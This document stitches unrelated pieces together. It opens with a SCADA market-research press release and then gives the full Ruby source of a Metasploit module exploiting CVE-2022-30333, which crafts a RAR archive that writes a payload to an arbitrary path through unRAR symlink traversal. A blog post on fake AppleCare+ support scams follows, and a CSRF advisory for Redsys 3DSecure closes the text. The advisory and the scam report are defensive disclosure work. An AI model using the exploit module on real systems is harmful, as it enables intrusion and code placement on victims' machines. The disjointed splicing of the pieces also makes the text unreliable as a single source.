Get A Glimpse Inside: Request Sample Pages \- https://www.meticulousresearch.com/request-sample-report/cp\_id=5186

Geographic Analysis:

By geography, the SCADA market is segmented into North America, Europe, Asia-Pacific, Latin America, and the Middle East & Africa. In 2024, North America is estimated to account for the largest share of 32.1% of the SCADA market. The North America SCADA market is expected to reach $5,488.3 million by 2031.

The industrial sector has seen extensive implementation of automation systems, especially in North America. Manufacturers in this region are increasingly deploying advanced automation technologies in their operations. North American countries are competing with their Asian and European counterparts to position themselves as key manufacturing centers, with the goal of lowering costs related to importing goods. The high labor costs in the U.S. are a primary impetus for the adoption of process control systems, such as SCADA (Supervisory Control and Data Acquisition), MES (Manufacturing Execution System), and DCS (Distributed Control System). These systems are instrumental in reducing the need for human oversight and management of automation processes.

Key market players are focusing on developing SCADA solutions with advanced features tailored for various industrial applications, including oil & gas, power, utilities, automotive, electronics, and F&B. For example, in October 2022, Emerson Electric Co. (U.S.) introduced Movicon.NExT 4.2, an advanced automation platform designed for seamless integration with field devices and enterprise systems. This software provides the data and insights necessary for achieving operational excellence across diverse applications in discrete and hybrid manufacturing sectors, including F&B, packaged consumer goods, energy, infrastructure, building automation, and machine automation.

Furthermore, in October 2022, AtomTech (U.S.) expanded its North American presence by launching AtomTech Canada. This move addresses the growing demand for automation, cybersecurity, SCADA, and IIoT 4.0 solutions across industries such as automotive, medical equipment, and warehouse logistics. Such developments support the growth of the SCADA market in the region during the forecast period.

Have specific research needs? Request a customized research report:- https://www.meticulousresearch.com/request-customization/cp\_id=5186

Asia-Pacific: The Fastest-growing Regional Market

The SCADA market in Asia-Pacific is poised to register the highest CAGR during the forecast period. In 2024, China is expected to account for the major share of the SCADA market in Asia-Pacific. Asia-Pacific generates significant growth opportunities for the adoption of industrial process control solutions, given its extensive and diverse manufacturing sector. Traditionally, manual or semi-automatic control processes have characterized industrial production in the region. However, advanced automation solutions are becoming essential for achieving the flexibility required in high-volume production lines, thereby enhancing overall operational efficiency.

Asia-Pacific is a prominent manufacturing hub across multiple sectors, including automotive, electronics, consumer goods, pharmaceuticals, and more. This manufacturing prominence is a significant driver of automation technology adoption in the region. SCADA solutions are increasingly being adopted in countries such as China, Japan, South Korea, and India, driven by efforts to modernize manufacturing facilities and the need for SCADA software to interface with Remote Terminal Units (RTUs), Programmable Logic Controllers (PLCs), and Human-Machine Interface (HMI) components. The focus on improving process efficiencies and reducing production costs further fuels market growth, enabling operators to analyze and make decisions from remote locations.

The rapid advancement of automation and artificial intelligence (AI) is having a profound impact on economies in the APAC region. Asiais expected to be the fastest-growing automation market, driven by factors such as population growth, urbanization, economic development, rising wages, and decreasing costs associated with automated industrial technologies. The increasing awareness of advanced industrial control solutions, including SCADA systems for comprehensive manufacturing process monitoring, is a key driver of this market growth.

The U.K. Continues to Dominate the SCADA Market in Europe

In 2024, the U.K. is expected to account for the largest share of the SCADA market in Europe. Several factors are driving the adoption of industrial control systems in the U.K., including the expansion of the manufacturing industry, stringent manufacturing and industrial safety regulations, increased diversity in consumer products, growing awareness of automated systems, and rising labor costs. Many enterprises and industries in the U.K. are increasingly adopting automated machines and control solutions to enhance operational process monitoring. Key sectors such as oil & gas, power, automotive, F&B, electronics, and semiconductors are leading the way in implementing industrial control systems. In response to the evolving needs of these industries, market players are actively developing advanced SCADA solutions. For example, in September 2020, Severn Trent plc (U.K.) invested USD 6.4 million to upgrade its SCADA monitoring and management systems to a cloud-based platform.

SCADA Market: Competition Analysis

This report offers a competitive analysis based on an extensive assessment of the leading players' product portfolios, geographic presence, and key growth strategies adopted over the past three to four years. Major companies in the SCADA market have implemented various strategies to expand their product offerings and global footprints and augment their market shares. The key strategies followed by most companies in the SCADA market were product launches & enhancements, acquisitions, expansion, partnerships, agreements, and collaborations. The key market players operating in the SCADA market include Rockwell Automation, Inc. (U.S.), Siemens AG (Germany), Eaton Corporation plc (Ireland), Schneider Electric SE (France), ABB Ltd (Switzerland), Yokogawa Electric Corporation (Japan), General Electric Company (U.S.), Emerson Electric Co. (U.S.), Honeywell International, Inc. (U.S.), Mitsubishi Electric Corporation (Japan), OMRON Corporation (Japan), Pilz GmbH & Co. KG (Germany), Survalent Technology Corporation (Canada), Valmet (Finland), and Hitachi, Ltd. (Japan).

Browse In-Depth Report Now - https://www.meticulousresearch.com/product/scada-market-5186

SCADA Industry Overview: Latest Developments from Key Industry Players

*   In June 2023, Siemens AG introduced the SICAM 8 power automation platform, which includes two new software solutions: the SICAM HMI (Human Machine Interface) visualization tool and the SICAM S8000 software solution for power automation. This platform is part of the Siemens Xcelerator portfolio, an open digital platform designed to help customers accelerate their digital transformation at scale.
    
*   In April 2023, Siemens AG partnered with Gujarat Metro Rail Corporation Limited (GMRCL) (India) to advance rail electrification technologies. Siemens Limited will deliver project management services and cutting-edge rail electrification technologies, including advanced power supply and distribution systems. Additionally, Siemens Limited will provide sophisticated digital solutions, such as Supervisory Control and Data Acquisition (SCADA) systems, for both metro projects.
    
*   In March 2023, Rockwell Automation launched FactoryTalk Optix, a new addition to the company's visualization portfolio. FactoryTalk Optix is a modern, cloud-enabled human-machine interface (HMI) platform that allows users to design, test, and deploy applications directly from a web browser remotely, in real time.
    
*   In February 2023, ABB launched the ABB Ability Symphony Plus distributed control system that delivers seamless and secure access to an extended digital ecosystem for power generation and water industries. It increases performance and enables plant-wide digitalization, offering a noninvasive modernization of the installed base.
    
*   In October 2022, Emerson released a new version of its DeltaV distributed control system (DCS). Version 15 helps plants digitally transform operations through improved production optimization and enhanced operator performance.
    
*   In April 2022, ABB partnered with Ramboll (Denmark) to explore new opportunities in offshore substations. ABB will leverage its expertise in the design and supply of electrical, SCADA, automation, and telecommunications equipment. This includes engineering, products, installation, commissioning, and operational maintenance of these systems.
    
*   In January 2022, Schneider Electric entered into an agreement with AVEVA, a leading technology company. This collaboration was designed to further AVEVA's digital and sustainability objectives. Schneider Electric's extensive reach and profound market expertise will support AVEVA in sustaining, expanding, and enhancing its leadership in the industrial automation software and SCADA sectors across the Pacific region.
    
*   In April 2021, Mitsubishi Electric updated its SCADA lineup with GENESIS64, introducing two new software products for system monitoring and process control. This new software suite replaced the MC Works64 SCADA software, which was designed for monitoring small production lines and managing multi-site monitoring.
    
*   In January 2021, Rockwell Automation acquired Fiix Inc. (Canada), an AI-enabled computerized maintenance management system (CMMS) company. This acquisition bolsters Rockwell Automation's software strategy and strengthens its Lifecycle Services business. The addition of Fiix enhances the company's ability to offer a comprehensive range of industrial automation services, aimed at maximizing the value of customers' production assets, systems, plants, and processes.

SCADA Market Is Set to Reach $18.7B by 2031

This Metasploit module creates a RAR file that exploits CVE-2022-30333, which is a path-traversal vulnerability in unRAR that can extract an arbitrary file to an arbitrary location on a Linux system. UnRAR fixed this vulnerability in version 6.12 (open source version 6.1.7). The core issue is that when a symbolic link is unRARed, Windows symbolic links are not properly validated on Linux systems and can therefore write a symbolic link that points anywhere on the filesystem. If a second file in the archive has the same name, it will be written to the symbolic link path.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  include Msf::Exploit::FILEFORMAT  include Msf::Exploit::EXE  include Msf::Exploit::Format::RarSymlinkPathTraversal  def initialize(info = {})    super(      update_info(        info,        'Name' => 'UnRAR Path Traversal (CVE-2022-30333)',        'Description' => %q{          This module creates a RAR file that exploits CVE-2022-30333, which is a          path-traversal vulnerability in unRAR that can extract an arbitrary file          to an arbitrary location on a Linux system. UnRAR fixed this          vulnerability in version 6.12 (open source version 6.1.7).          The core issue is that when a symbolic link is unRAR'ed, Windows          symbolic links are not properly validated on Linux systems and can          therefore write a symbolic link that points anywhere on the filesystem.          If a second file in the archive has the same name, it will be written          to the symbolic link path.        },        'Author' => [          'Simon Scannell', # Discovery / initial disclosure (via Sonar)          'Ron Bowes', # Analysis, PoC, and module        ],        'License' => MSF_LICENSE,        'References' => [          ['CVE', '2022-30333'],          ['URL', 'https://blog.sonarsource.com/zimbra-pre-auth-rce-via-unrar-0day/'],          ['URL', 'https://github.com/pmachapman/unrar/commit/22b52431a0581ab5d687747b65662f825ec03946'],          ['URL', 'https://attackerkb.com/topics/RCa4EIZdbZ/cve-2022-30333/rapid7-analysis'],        ],        'Platform' => 'linux',        'Arch' => [ARCH_X86, ARCH_X64],        'Targets' => [          [ 'Generic RAR file', {} ]        ],        'DefaultTarget' => 0,        'Privileged' => false,        'DisclosureDate' => '2022-06-28',        'Notes' => {          'Stability' => [CRASH_SAFE],          'Reliability' => [],          'SideEffects' => []        }      )    )    register_options(      [        OptString.new('FILENAME', [ false, 'The file name.', 'payload.rar']),        OptString.new('CUSTOM_PAYLOAD', [ false, 'A custom payload to encode' ]),        OptString.new('TARGET_PATH', [ true, 'The location the payload should extract to (can, and should, contain path traversal characters - "../../" - as well as a filename).']),        OptString.new('SYMLINK_FILENAME', [ true, 'The name of the symlink file to use (must be 12 characters or less; default: random)', Rex::Text.rand_text_alpha_lower(4..12)])      ]    )  end  def exploit    print_status("Target filename: #{datastore['TARGET_PATH']}")    if datastore['CUSTOM_PAYLOAD'].present?      print_status("Encoding custom payload file: #{datastore['CUSTOM_PAYLOAD']}")      payload_data = File.binread(datastore['CUSTOM_PAYLOAD'])      # Append a newline + NUL byte, since random data will be appended and we      # don't want to break shellscripts      payload_data.concat("\n\0")    else      print_status('Encoding configured payload')      payload_data = generate_payload_exe    end    begin      rar = encode_as_traversal_rar(datastore['SYMLINK_FILENAME'], datastore['TARGET_PATH'], payload_data)    rescue StandardError => e      fail_with(Failure::BadConfig, "Failed to encode RAR file: #{e}")    end    file_create(rar)  endend

UnRAR Path Traversal

Beware before calling Apple for assistance as scammers are creating malicious ads and fake pages to lure you in.

We’ve uncovered a malicious campaign going after Mac users looking for support or extended warranty from Apple via the AppleCare+ support plans. The perpetrators are buying Google ads to lure in their victims and redirect them to bogus pages hosted on GitHub, the developer and code repository platform owned by Microsoft.

The goal of this scam is to get unsuspecting people on the phone with someone pretending to be working for Apple. From there, fraudulent call center agents will social engineer their victims in order to extract money from them.

In this blog post, we expose the techniques behind this scam and provide mitigation steps to stay away from them. We’d like to thank GitHub for their quick response in taking down the malicious accounts we reported to them.

**Hey Siri, google “Apple phone support”**

While Apple products are designed with simplicity in mind, we’ve all come across an issue at some point that we need assistance with. Google, who reportedly paid Apple $20 billion to be the default search engine, will display results in Safari, along with ads, hence the lucrative partnership.

Those “Sponsored” results can appear at the top or further down the search results page. In the image seen below, a malicious ad appears at the very top, right before Apple’s official phone number. In other cases we encountered, multiple malicious ads were displayed before any legitimate results.

Clicking on one of those will redirect to a fake AppleCare+ customer service page, inviting users to call a 1-800 phone number supposedly belonging to Apple. In reality, in just 2 simple clicks victims are connected with scammers located in call centers overseas.

The fake Apple customer service pages are hosted on Microsoft’s GitHub source code repository as standalone HTML templates using Apple’s branding. Scammers are creating several accounts on GitHub with one or multiple repositories with the same fraudulent _index.html_ template:

During an active campaign, they can easily swap phone numbers in case one got reported and blocked. In fact, we saw scammers do just that thanks to GitHub’s commit history:

There is also an interesting piece of code within the page (autoDial) that automatically pops up the phone dialog menu. This ensures that victims have one less thing to click on to get connected with a scammer impersonating Apple:

**Risks and mitigations**

This particular scheme is exceptionally easy to fall for due to the combination of malicious Google ads and lookalike pages. Scammers are preying on unsuspecting users to trust that they are real Apple service agents and that it’s okay to give them personal information.

The biggest risk to consumers is being defrauded for hundreds, and often thousands of dollars. Scammers typically instruct victims to withdraw money from their bank account and send it to them, in various ways.

In some cases we investigated this year, fraudsters will ask for the victim’s name, address, social security number and banking details. With that information, they can easily blackmail them directly or share their profile with other scammers who will pretend to help from the original incident.

We advise users to be extremely cautious when looking for phone or online support related to any of the most popular brands. Microsoft is usually highly targeted by scammers due to its dominance in the computer market share. Keep in mind that whenever you click on a sponsored result or ad, you are taking a chance of being redirected to a malicious site.

If you want to find out what personal data of yours has been exposed online, you can use our free Digital Footprint scan. Fill in the email address you’re curious about (it’s best to submit the one you most frequently use) and we’ll send you a free report.

**We don’t just report on threats – we help safeguard your entire digital identit**y

Cybersecurity risks should never spread beyond a headline. Protect your—and your family’s—personal information by using identity protection.

 Scammers advertise fake AppleCare+ service via GitHub repos 

A cross site request forgery vulnerability was identified in the Authorization Method of 3DSecure version 2.0, allowing attackers to submit unauthorized form data by modifying the HTTP Origin and Referer headers.

    Product: 3DSecure 2.0Manufacturer: RedsysAffected Version(s): 3DSecure 2.0 3DS Authorization MethodTested Version(s): 3DSecure 2.0 3DS Authorization MethodVulnerability Type: Cross-Site Request Forgery (CSRF)Risk Level: MediumSolution Status: Not yet fixedManufacturer Notification: 2024-01-17Solution Date: N/APublic Disclosure: 2024-09-17CVE Reference: CVE-2024-25286Overview:A Cross-Site Request Forgery (CSRF) vulnerability was identified in the Authorization Method of 3DSecure 2.0, allowing attackers to submit unauthorized form data by modifying the HTTP Origin and Referer headers.Vulnerability Details:By altering the Origin and Referer headers, attackers can trick the server into processing unauthorized transactions.Solution:No solution is currently available. Redsys has been notified.References:OWASP Web Security Testing Guide: CSRFDiscoverer:Reported by Rubén López Herrera________________________________Este mensaje y sus adjuntos se dirigen exclusivamente a su destinatario, puede contener información privilegiada o confidencial y es para uso exclusivo de la persona o entidad de destino. Si no es usted. el destinatario indicado, queda notificado de que la lectura, utilización, divulgación y/o copia sin autorización puede estar prohibida en virtud de la legislación vigente. Si ha recibido este mensaje por error, le rogamos que nos lo comunique inmediatamente por esta misma vía y proceda a su destrucción.The information contained in this transmission is confidential and privileged information intended only for the use of the individual or entity named above. If the reader of this message is not the intended recipient, you are hereby notified that any dissemination, distribution or copying of this communication is strictly prohibited. If you have received this transmission in error, do not read it. Please immediately reply to the sender that you have received this communication in error and then delete it.Esta mensagem e seus anexos se dirigem exclusivamente ao seu destinatário, pode conter informação privilegiada ou confidencial e é para uso exclusivo da pessoa ou entidade de destino. Se não é vossa senhoria o destinatário indicado, fica notificado de que a leitura, utilização, divulgação e/ou cópia sem autorização pode estar proibida em virtude da legislação vigente. Se recebeu esta mensagem por erro, rogamos-lhe que nos o comunique imediatamente por esta mesma via e proceda a sua destruição

Tag

#mac